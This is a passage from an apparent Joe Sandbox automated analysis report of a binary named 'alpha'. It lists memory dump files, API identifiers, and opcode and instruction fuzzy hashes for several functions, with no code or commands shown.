                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction ID: de7341eaff294e0fa4b986d100db65a47f8d58b4a410fc43f059cbba3fc9c882
                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction Fuzzy Hash: CC21A23591EB46A6EB408B04F8843A977B4FB89755F600035EA8EC2764DF7DE448D710
                                                                                          Function 00007FF6A0E9F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 1606018815-0
                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction ID: c3dded3544f514608084aaf374009de46997bbcac01cabbbcdba41e8799c34af
                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction Fuzzy Hash: 08F03035A26A43EBD7045B20E844279FAB0FB8EB13F959234EA0F42394DF3CD4088B00
                                                                                          Function 00007FF6A0E7B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 3$3
                                                                                          • API String ID: 0-2538865259
                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction ID: db99402bb4abab997ffae0f2246b5a97a628e6cbb8c46947602a823d9dd37cdf
                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction Fuzzy Hash: 33016972D0F283FAF3558BA0A8843747660BF86311F548236C51ED17A3DF3C6485B641